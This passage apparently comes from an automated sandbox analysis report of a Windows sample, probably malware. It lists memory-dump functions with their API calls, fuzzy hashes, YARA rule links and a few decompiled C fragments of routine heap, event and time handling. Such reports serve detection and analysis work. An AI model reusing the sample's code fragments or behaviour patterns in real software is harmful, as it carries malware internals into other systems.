                              • GetLastError.KERNEL32(?,?,?,0102C682,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0102187D,?,0000001E), ref: 01031572
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: ByteCharErrorLastMultiWide
                              • String ID:
                              • API String ID: 203985260-0
                              • Opcode ID: 19f5bbb68e4b55fdf72f8b7fc5fbedc482ab9c28f42607c4a3f8fa245a64df6a
                              • Instruction ID: 683b876c319b9aca9e930530f65145906949868432399f6070d51756985f155e
                              • Opcode Fuzzy Hash: 19f5bbb68e4b55fdf72f8b7fc5fbedc482ab9c28f42607c4a3f8fa245a64df6a
                              • Instruction Fuzzy Hash: 8801757A508251FF96319F269C48D6BBBECEBCA760B144A19F5E2921C0D6315800C671
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 010269C9, Relevance: 6.1, APIs: 4, Instructions: 56stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(?), ref: 010269DD
                                • Part of subcall function 0103032D: RtlAllocateHeap.NTDLL(00000000,?,010424D0), ref: 01030339
                              • mbstowcs.NTDLL ref: 010269F7
                              • lstrlen.KERNEL32(?), ref: 01026A02
                              • mbstowcs.NTDLL ref: 01026A1C
                                • Part of subcall function 0103F63F: lstrlenW.KERNEL32(?,00000000,747869A0,?,00000250,?,00000000), ref: 0103F68B
                                • Part of subcall function 0103F63F: lstrlenW.KERNEL32(?,?,00000000), ref: 0103F697
                                • Part of subcall function 0103F63F: memset.NTDLL ref: 0103F6DF
                                • Part of subcall function 0103F63F: FindFirstFileW.KERNEL32(00000000,00000000), ref: 0103F6FA
                                • Part of subcall function 0103F63F: lstrlenW.KERNEL32(0000002C), ref: 0103F732
                                • Part of subcall function 0103F63F: lstrlenW.KERNEL32(?), ref: 0103F73A
                                • Part of subcall function 0103F63F: memset.NTDLL ref: 0103F75D
                                • Part of subcall function 0103F63F: wcscpy.NTDLL ref: 0103F76F
                                • Part of subcall function 010469F0: RtlFreeHeap.NTDLL(00000000,?,010262C2,00000000), ref: 010469FC
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: lstrlen$Heapmbstowcsmemset$AllocateFileFindFirstFreewcscpy
                              • String ID:
                              • API String ID: 1961997177-0
                              • Opcode ID: 01ca3c39d77af0fa32a8e813469a6edc01b787f4edcf1beadd0656be2ea829ec
                              • Instruction ID: 00d79017b03a93ceb497d8ac084ee89b7949e9b8c1ef27669c101bcadd6e9bf0
                              • Opcode Fuzzy Hash: 01ca3c39d77af0fa32a8e813469a6edc01b787f4edcf1beadd0656be2ea829ec
                              • Instruction Fuzzy Hash: 0B0124B7900216B7DB216BA9DC84FDF7FACEF94310F104026FA8193100EAB6DA0087A0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 010395A5, Relevance: 6.1, APIs: 4, Instructions: 54memorystringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(?), ref: 010395B2
                              • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 010395D8
                              • lstrcpy.KERNEL32(00000014,?), ref: 010395FD
                              • memcpy.NTDLL(?,?,?), ref: 0103960A
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: AllocateHeaplstrcpylstrlenmemcpy
                              • String ID:
                              • API String ID: 1388643974-0
                              • Opcode ID: 36d275abca7d3af1975ae66aadd78c18c7da63b0d96227e93af2068b3cf757ec
                              • Instruction ID: adb9eb07e0fba63f9d843e43eba4540b329fe97e01595a1a5d7f9bae1604ac06
                              • Opcode Fuzzy Hash: 36d275abca7d3af1975ae66aadd78c18c7da63b0d96227e93af2068b3cf757ec
                              • Instruction Fuzzy Hash: 851149B590160AEFCB21CF58D984A9ABBF8FF48708F10855DF88687210C775E914DB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 010345D5, Relevance: 6.1, APIs: 4, Instructions: 54memorystringtimeCOMMON
                              Download Yara Rule
                              APIs
                              • GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 010345E8
                              • lstrlen.KERNEL32(04B3BF48), ref: 01034609
                              • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 01034621
                              • lstrcpy.KERNEL32(00000000,04B3BF48), ref: 01034633
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Time$AllocateFileHeapSystemlstrcpylstrlen
                              • String ID:
                              • API String ID: 1929783139-0
                              • Opcode ID: f11725087db766d41fc4d2a36e442e87ae4f0307865620905ce667ad1269de97
                              • Instruction ID: 2b8f7b937d2757b35fd0f494636ee04853e448d4437f3b76560128b8d38b487b
                              • Opcode Fuzzy Hash: f11725087db766d41fc4d2a36e442e87ae4f0307865620905ce667ad1269de97
                              • Instruction Fuzzy Hash: ED01C8B6A00208EFD7219FADA884BAFBFFCAB89301F144068F986D3205D6359505CB75
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 010445CE, Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0103032D: RtlAllocateHeap.NTDLL(00000000,?,010424D0), ref: 01030339
                              • RtlInitializeCriticalSection.NTDLL(01050460), ref: 010445F2
                              • RtlInitializeCriticalSection.NTDLL(01050440), ref: 01044608
                              • GetVersion.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,0103940A,?,?,?), ref: 01044619
                              • GetModuleHandleA.KERNEL32(00001597,?,00000000,?,?,?,?,?,?,?,?,?,0103940A,?,?,?), ref: 0104464D
                                • Part of subcall function 0103EFDA: GetModuleHandleA.KERNEL32(?,00000001,77E49EB0,00000000,?,?,00000000,01044630,?,00000000), ref: 0103EFF2
                                • Part of subcall function 0103EFDA: LoadLibraryA.KERNEL32(?), ref: 0103F093
                                • Part of subcall function 0103EFDA: FreeLibrary.KERNEL32(00000000), ref: 0103F09E
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: CriticalHandleInitializeLibraryModuleSection$AllocateFreeHeapLoadVersion
                              • String ID:
                              • API String ID: 1711133254-0
                              • Opcode ID: 4b63a823ac81d5156e5d8d31ee5ecb283d17c57bdaff1c6ae186c342683ecacd
                              • Instruction ID: adf7155ea4953d51e954c7e183377c100d9a0c70a388a3bc7f18a4c3b43c0897
                              • Opcode Fuzzy Hash: 4b63a823ac81d5156e5d8d31ee5ecb283d17c57bdaff1c6ae186c342683ecacd
                              • Instruction Fuzzy Hash: F01139F5A80301CFD7A09F69A8C465F3BE8E788314B00452AF9D5C720CDABA58408F55
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01025B4D, Relevance: 6.0, APIs: 4, Instructions: 49sleepCOMMON
                              Download Yara Rule
                              APIs
                              • RtlEnterCriticalSection.NTDLL(01050488), ref: 01025B58
                              • Sleep.KERNEL32(0000000A,?,?,0103738E,00000000,?,010501F4), ref: 01025B62
                              • SetEvent.KERNEL32(?,?,0103738E,00000000,?,010501F4), ref: 01025BB9
                              • RtlLeaveCriticalSection.NTDLL(01050488), ref: 01025BD8
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: CriticalSection$EnterEventLeaveSleep
                              • String ID:
                              • API String ID: 1925615494-0
                              • Opcode ID: 2f7a7a583c828366d83caf3e6cf6d28d317ff4f303605d61da52f676159b5f13
                              • Instruction ID: 28f9669e5f4ef144b0a2ce6ee3dd29afc848e371a9de6e6feb9a2bcb32406cca
                              • Opcode Fuzzy Hash: 2f7a7a583c828366d83caf3e6cf6d28d317ff4f303605d61da52f676159b5f13
                              • Instruction Fuzzy Hash: 7E016DB4780314EFEB619B69DC45BAA3AACEB14751F404051F6C5D6089D77A8900CF55
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0103D444, Relevance: 6.0, APIs: 4, Instructions: 48fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 01033763: lstrlen.KERNEL32(00000000,00000000,00000000,0103FD57,?,00000000,?,?,00000000,?,?,00000000,?,?,00000000), ref: 01033768
                                • Part of subcall function 01033763: RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 0103377D
                                • Part of subcall function 01033763: wsprintfA.USER32 ref: 01033799
                                • Part of subcall function 01033763: HeapFree.KERNEL32(00000000,00000000,00000000,000000FF), ref: 010337B5
                              • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0103D472
                              • GetFileSize.KERNEL32(00000000,00000000), ref: 0103D481
                              • CloseHandle.KERNEL32(00000000), ref: 0103D48B
                              • GetLastError.KERNEL32 ref: 0103D493
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: FileHeap$AllocateCloseCreateErrorFreeHandleLastSizelstrlenwsprintf
                              • String ID:
                              • API String ID: 4042893638-0
                              • Opcode ID: 23dad962ba23d37378c21890302dcda516f7e261aad9ab53669f2c5a8057a018
                              • Instruction ID: 5e3d1b22b63cc64db7740ce55b4597c152805e714489bc50f347a400078df3bb
                              • Opcode Fuzzy Hash: 23dad962ba23d37378c21890302dcda516f7e261aad9ab53669f2c5a8057a018
                              • Instruction Fuzzy Hash: 73F0D6B1200214BBE3316EA9DCCCEDF7F6CEF91760F508016FACAD2080DA39964087A0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0103EB37, Relevance: 6.0, APIs: 4, Instructions: 41memorystringCOMMON
                              Download Yara Rule
                              APIs
                              • InterlockedExchange.KERNEL32(010500C0,00000000), ref: 0103EB43
                              • RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 0103EB5E
                              • lstrcpy.KERNEL32(00000000,?), ref: 0103EB87
                              • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 0103EBA8
                                • Part of subcall function 0103E5FC: SetEvent.KERNEL32(?,?,0102EA6E), ref: 0103E611
                                • Part of subcall function 0103E5FC: WaitForSingleObject.KERNEL32(?,000000FF,?,?,0102EA6E), ref: 0103E631
                                • Part of subcall function 0103E5FC: CloseHandle.KERNEL32(00000000,?,0102EA6E), ref: 0103E63A
                                • Part of subcall function 0103E5FC: CloseHandle.KERNEL32(?,?,?,0102EA6E), ref: 0103E644
                                • Part of subcall function 0103E5FC: RtlEnterCriticalSection.NTDLL(?), ref: 0103E64C
                                • Part of subcall function 0103E5FC: RtlLeaveCriticalSection.NTDLL(?), ref: 0103E664
                                • Part of subcall function 0103E5FC: CloseHandle.KERNEL32(?), ref: 0103E680
                                • Part of subcall function 0103E5FC: LocalFree.KERNEL32(?), ref: 0103E68B
                                • Part of subcall function 0103E5FC: RtlDeleteCriticalSection.NTDLL(?), ref: 0103E695
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: CloseCriticalHandleSection$FreeHeap$AllocateDeleteEnterEventExchangeInterlockedLeaveLocalObjectSingleWaitlstrcpy
                              • String ID:
                              • API String ID: 1103286547-0
                              • Opcode ID: c16b54354c19d9df2305ca8022d70d603c37cd9da0dfd1fbcc5b91eba68f5f39
                              • Instruction ID: 3226cbfea45111f01708b7423645cfb288bf3b5b39c317a314fcd9155a04f0d7
                              • Opcode Fuzzy Hash: c16b54354c19d9df2305ca8022d70d603c37cd9da0dfd1fbcc5b91eba68f5f39
                              • Instruction Fuzzy Hash: 5AF0AF35780322BBE7706A65ED49F8B3E59FB80B51F040124F686A7188D97A9805CBA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01033EE7, Relevance: 6.0, APIs: 4, Instructions: 41filestringsynchronizationCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcatW.KERNEL32(00000000,00001000), ref: 01033EF9
                                • Part of subcall function 01026D99: CreateFileW.KERNEL32(00000000,C0000000,010223FB,00000000,010223FC,00000080,00000000,00000000,01048BAA,747869A0,010223FB,?), ref: 01026DDA
                                • Part of subcall function 01026D99: GetLastError.KERNEL32 ref: 01026DE4
                                • Part of subcall function 01026D99: WaitForSingleObject.KERNEL32(000000C8), ref: 01026E09
                                • Part of subcall function 01026D99: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000), ref: 01026E2A
                                • Part of subcall function 01026D99: SetFilePointer.KERNEL32(00000001,00000000,00000000,00000002), ref: 01026E52
                                • Part of subcall function 01026D99: WriteFile.KERNEL32(00000001,00001388,?,00000002,00000000), ref: 01026E67
                                • Part of subcall function 01026D99: SetEndOfFile.KERNEL32(00000001), ref: 01026E74
                                • Part of subcall function 01026D99: CloseHandle.KERNEL32(00000001), ref: 01026E8C
                              • WaitForSingleObject.KERNEL32(00002710,00000000,00000000,?,00000005,?,0103E92E,?,00000000,00001000,00000000,00000000,00001000), ref: 01033F1C
                              • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000,?,0103E92E,?,00000000,00001000,00000000,00000000,00001000), ref: 01033F3E
                              • GetLastError.KERNEL32(?,0103E92E,?,00000000,00001000,00000000,00000000,00001000), ref: 01033F52
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: File$Create$ErrorLastObjectSingleWait$CloseHandlePointerWritelstrcat
                              • String ID:
                              • API String ID: 3370347312-0
                              • Opcode ID: c77a885ebaaf4c9cf309133d2479bc6a8394e0ba16d7e9d3a74210c64db63376
                              • Instruction ID: cca895c0f752255dc52eeef5261cb684156cdb99a0eac3f132c155d3c6b94c27
                              • Opcode Fuzzy Hash: c77a885ebaaf4c9cf309133d2479bc6a8394e0ba16d7e9d3a74210c64db63376
                              • Instruction Fuzzy Hash: AEF0A975280205FFEB221F64ED8AF9E3B69BF46310F100114FBDBA90D0D77A91209B69
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0102CF8A, Relevance: 6.0, APIs: 4, Instructions: 39filesynchronizationpipeCOMMON
                              Download Yara Rule
                              APIs
                              • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001,0000003A,0102556D,000000FF,04B3B7F0,?,?,0103652C,0000003A,04B3B7F0), ref: 0102CFA6
                              • GetLastError.KERNEL32(?,?,0103652C,0000003A,04B3B7F0,?,?,?,0102FFEA,00000001,00000001,04B38560), ref: 0102CFB1
                              • WaitNamedPipeA.KERNEL32(00002710), ref: 0102CFD3
                              • WaitForSingleObject.KERNEL32(00000000,?,?,0103652C,0000003A,04B3B7F0,?,?,?,0102FFEA,00000001,00000001,04B38560), ref: 0102CFE1
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Wait$CreateErrorFileLastNamedObjectPipeSingle
                              • String ID:
                              • API String ID: 4211439915-0
                              • Opcode ID: 6b42b3072594166759f8f7c7413e22dd314565e277cf27f2c2376e372e8440cb
                              • Instruction ID: 837699ed728a400169f854d35c4db5ffce3dc40b4f3af82df7471ebd5467eb23
                              • Opcode Fuzzy Hash: 6b42b3072594166759f8f7c7413e22dd314565e277cf27f2c2376e372e8440cb
                              • Instruction Fuzzy Hash: 66F06276640130ABF3711A69AE8DF9F7E55EB043A1F110525FA8AE71D4C63A4840C794
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01033763, Relevance: 6.0, APIs: 4, Instructions: 38memorystringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(00000000,00000000,00000000,0103FD57,?,00000000,?,?,00000000,?,?,00000000,?,?,00000000), ref: 01033768
                              • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 0103377D
                              • wsprintfA.USER32 ref: 01033799
                                • Part of subcall function 0104339E: memset.NTDLL ref: 010433B3
                                • Part of subcall function 0104339E: lstrlenW.KERNEL32(00000000,00000000,00000000,77E5DBB0,00000020,00000000), ref: 010433EC
                                • Part of subcall function 0104339E: wcstombs.NTDLL ref: 010433F6
                                • Part of subcall function 0104339E: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,77E5DBB0,00000020,00000000), ref: 01043427
                                • Part of subcall function 0104339E: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,0102DC52), ref: 01043453
                                • Part of subcall function 0104339E: TerminateProcess.KERNEL32(?,000003E5), ref: 01043469
                                • Part of subcall function 0104339E: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,0102DC52), ref: 0104347D
                                • Part of subcall function 0104339E: CloseHandle.KERNEL32(?), ref: 010434B0
                                • Part of subcall function 0104339E: CloseHandle.KERNEL32(?), ref: 010434B5
                              • HeapFree.KERNEL32(00000000,00000000,00000000,000000FF), ref: 010337B5
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: CloseHandleHeapMultipleObjectsProcessWaitlstrlen$AllocateCreateFreeTerminatememsetwcstombswsprintf
                              • String ID:
                              • API String ID: 1624158581-0
                              • Opcode ID: b305d346c55ed1d784777071b02ce95bfb6cf7db415d9feeea360dc9e5746843
                              • Instruction ID: a7d0dd3fa76383cb2feb71af2061617c161ee3db9c24f0e310eff1d273b5557c
                              • Opcode Fuzzy Hash: b305d346c55ed1d784777071b02ce95bfb6cf7db415d9feeea360dc9e5746843
                              • Instruction Fuzzy Hash: F1F0E9B9240210BBD331172DBD8CF5F7AADFFC1760F050121F981DB298CA698805C7A0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01039FCB, Relevance: 6.0, APIs: 4, Instructions: 30sleepmemoryCOMMON
                              Download Yara Rule
                              APIs
                              • RtlEnterCriticalSection.NTDLL(04B3C0A0), ref: 01039FD4
                              • Sleep.KERNEL32(0000000A,?,010394CE,00000000,00000000,01024FAB,?,00000000), ref: 01039FDE
                              • HeapFree.KERNEL32(00000000,?,?,010394CE,00000000,00000000,01024FAB,?,00000000), ref: 0103A006
                              • RtlLeaveCriticalSection.NTDLL(04B3C0A0), ref: 0103A024
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                              • String ID:
                              • API String ID: 58946197-0
                              • Opcode ID: 2758e15189ade6d74ddca08376f62f36de4917d12980db73c745d47eb3b325f3
                              • Instruction ID: 17bc2601fab2b1b3f1f32f11a3fc1539689a7f4484174e23dbb55857acee0dbc
                              • Opcode Fuzzy Hash: 2758e15189ade6d74ddca08376f62f36de4917d12980db73c745d47eb3b325f3
                              • Instruction Fuzzy Hash: CCF034B5780342EFE7709F68DA88F0B7BA8EB40344B008404B5C6D72AAC63AE854CB15
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 013E5C2B, Relevance: 6.0, APIs: 4, Instructions: 29memoryCOMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E013E5C2B() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x13ed2a4; // 0x2a0
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x13ed2f4; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x13ed2a4; // 0x2a0
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x13ed270; // 0x36e0000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}








                              0x013e5c2b
                              0x013e5c32
                              0x013e5c7c
                              0x013e5c7e
                              0x013e5c7e
                              0x013e5c36
                              0x013e5c3c
                              0x013e5c41
                              0x013e5c45
                              0x013e5c4b
                              0x013e5c52
                              0x00000000
                              0x00000000
                              0x013e5c54
                              0x013e5c59
                              0x00000000
                              0x00000000
                              0x00000000
                              0x013e5c59
                              0x013e5c5b
                              0x013e5c63
                              0x013e5c66
                              0x013e5c66
                              0x013e5c6c
                              0x013e5c73
                              0x013e5c76
                              0x013e5c76
                              0x00000000

                              APIs
                              • SetEvent.KERNEL32(000002A0,00000001,013E4170), ref: 013E5C36
                              • SleepEx.KERNEL32(00000064,00000001), ref: 013E5C45
                              • CloseHandle.KERNEL32(000002A0), ref: 013E5C66
                              • HeapDestroy.KERNEL32(036E0000), ref: 013E5C76
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: CloseDestroyEventHandleHeapSleep
                              • String ID:
                              • API String ID: 4109453060-0
                              • Opcode ID: 584c3fa1d81f64d6f47de341ef905466f03898c04d7de328f1ffc46b43a2cde3
                              • Instruction ID: c7ea89e0339d505502f571ca8e369618e4db297e67fe88bd0cbb02fdca769cea
                              • Opcode Fuzzy Hash: 584c3fa1d81f64d6f47de341ef905466f03898c04d7de328f1ffc46b43a2cde3
                              • Instruction Fuzzy Hash: C7F03775B013225FEF30AA78995CB0B3EECAB05769F040614FE15DF1C8CA20C9118760
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01032385, Relevance: 6.0, APIs: 4, Instructions: 28sleepmemoryCOMMON
                              Download Yara Rule
                              APIs
                              • RtlEnterCriticalSection.NTDLL(04B3C0A0), ref: 0103238E
                              • Sleep.KERNEL32(0000000A,?,010394CE,00000000,00000000,01024FAB,?,00000000), ref: 01032398
                              • HeapFree.KERNEL32(00000000,?,?,010394CE,00000000,00000000,01024FAB,?,00000000), ref: 010323C6
                              • RtlLeaveCriticalSection.NTDLL(04B3C0A0), ref: 010323DB
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                              • String ID:
                              • API String ID: 58946197-0
                              • Opcode ID: e9aed6e3e07a5a3121fa5cb4054f011074e215e41171e516a1e130ab708090a3
                              • Instruction ID: 1ed33e618b6e533bbec8bce0c4b142c16a0b3854ba4106f26063e184aa11997e
                              • Opcode Fuzzy Hash: e9aed6e3e07a5a3121fa5cb4054f011074e215e41171e516a1e130ab708090a3
                              • Instruction Fuzzy Hash: 4AF0DAB8791302DBE7688F15DA89F1B77A9EB45701B04C045F9C297669C77EA840CB11
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 013E3A79, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47memorytimeCOMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E013E3A79(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				struct _FILETIME _v12;
				void* _t11;
				void* _t20;
				void* _t22;
				void* _t23;
				signed short* _t24;

				_t22 = __edx;
				_t23 = E013E65F6(_t11, _a12);
				if(_t23 == 0) {
					_t20 = 8;
				} else {
					_t24 = _t23 + _a16 * 2;
					 *_t24 =  *_t24 & 0x00000000;
					_t20 = E013E6B4F(__ecx, _a4, _a8, _t23);
					if(_t20 == 0) {
						GetSystemTimeAsFileTime( &_v12);
						 *_t24 = 0x5f;
						_t20 = E013E6E41(_t22, _a4, 0x80000001, _a8, _t23,  &_v12, 8);
					}
					HeapFree( *0x13ed270, 0, _t23);
				}
				return _t20;
			}









                              0x013e3a79
                              0x013e3a8a
                              0x013e3a8e
                              0x013e3ae7
                              0x013e3a90
                              0x013e3a97
                              0x013e3a9d
                              0x013e3aa6
                              0x013e3aaa
                              0x013e3ab0
                              0x013e3ac0
                              0x013e3ad2
                              0x013e3ad2
                              0x013e3add
                              0x013e3add
                              0x013e3aee

                              APIs
                                • Part of subcall function 013E65F6: lstrlen.KERNEL32(?,00000000,03AD9B78,00000000,013E25B8,03AD9D56,69B25F44,?,?,?,?,69B25F44,00000005,013ED00C,4D283A53,?), ref: 013E65FD
                                • Part of subcall function 013E65F6: mbstowcs.NTDLL ref: 013E6626
                                • Part of subcall function 013E65F6: memset.NTDLL ref: 013E6638
                              • GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,74785520,00000008,00000014,004F0053,03AD93AC), ref: 013E3AB0
                              • HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,74785520,00000008,00000014,004F0053,03AD93AC), ref: 013E3ADD
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
                              • String ID: Uxt
                              • API String ID: 1500278894-1536154274
                              • Opcode ID: 9fafbd4ef5e2189edec04ddd020fcf519bbb5c5fa21e9472c745604feff26230
                              • Instruction ID: 1d1b66f193cf14e50fe886bd85b8a4f7c8ab4be5b117045b1a9207e3d5a6ec8c
                              • Opcode Fuzzy Hash: 9fafbd4ef5e2189edec04ddd020fcf519bbb5c5fa21e9472c745604feff26230
                              • Instruction Fuzzy Hash: 17017C3260031ABBEB216F99DC49E9B7FBDFB84718F004025FA009A191EB71D854C750
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01032F09, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON
                              Download Yara Rule
                              APIs
                              • memcpy.NTDLL(?,?,?), ref: 01032F4D
                              • StrToIntExA.SHLWAPI(00007830,00000001,00000001), ref: 01032F5F
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: memcpy
                              • String ID: 0x
                              • API String ID: 3510742995-3225541890
                              • Opcode ID: aebcfc746ed98ee94c12a2585c4db682fc0b0473b6790204596a0a2fdd3b1632
                              • Instruction ID: cb487c133bf0dc1bd8cec83042e1d522cd16dc35a70222822620fed3fb143d1b
                              • Opcode Fuzzy Hash: aebcfc746ed98ee94c12a2585c4db682fc0b0473b6790204596a0a2fdd3b1632
                              • Instruction Fuzzy Hash: BE015E75A0010AAFDB01DAACC9459AEBBB9EB84244F004565E984E7140E7709A09C791
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 010241E2, Relevance: 5.2, APIs: 4, Instructions: 171memoryCOMMON
                              Download Yara Rule
                              APIs
                              • memset.NTDLL ref: 0102423E
                              • CloseHandle.KERNEL32(?,?,00000100,?), ref: 0102428C
                              • HeapFree.KERNEL32(00000000,?,00000094,00000000,01029FB1,00000000,?,01041646,00000000,?,01032F93,00000000,?,0103FF7D,00000000,?), ref: 010244F0
                              • GetLastError.KERNEL32(?,?), ref: 010247F0
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: CloseErrorFreeHandleHeapLastmemset
                              • String ID:
                              • API String ID: 2333114656-0
                              • Opcode ID: 9ecace4183b75d5359f13fa8bd924ece37ccf1b1bcd4493eb7ecc303ff71c779
                              • Instruction ID: 994eb28816de081eb5a4e7e3da79c49085028ede26791b1ef0ad603b2fe4e287
                              • Opcode Fuzzy Hash: 9ecace4183b75d5359f13fa8bd924ece37ccf1b1bcd4493eb7ecc303ff71c779
                              • Instruction Fuzzy Hash: BF510A7560422AFFEB21AF64DC80FEF7AACBB56700F004061FAE5D6080DB75C9558B22
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01029449, Relevance: 5.1, APIs: 4, Instructions: 83memoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 01033D4D: lstrlen.KERNEL32(00000000,?,?,?,77E34620,?,?,?,?,0102576D,?,?,?,?,?), ref: 01033DA6
                                • Part of subcall function 01033D4D: lstrlen.KERNEL32(?,?,?,?,77E34620,?,?,?,?,0102576D,?,?,?,?,?), ref: 01033DC4
                                • Part of subcall function 01033D4D: RtlAllocateHeap.NTDLL(00000000,74786985,?), ref: 01033DED
                                • Part of subcall function 01033D4D: memcpy.NTDLL(00000000,00000000,00000000,?,77E34620,?,?,?,?,0102576D,?,?,?,?,?), ref: 01033E04
                                • Part of subcall function 01033D4D: HeapFree.KERNEL32(00000000,00000000), ref: 01033E17
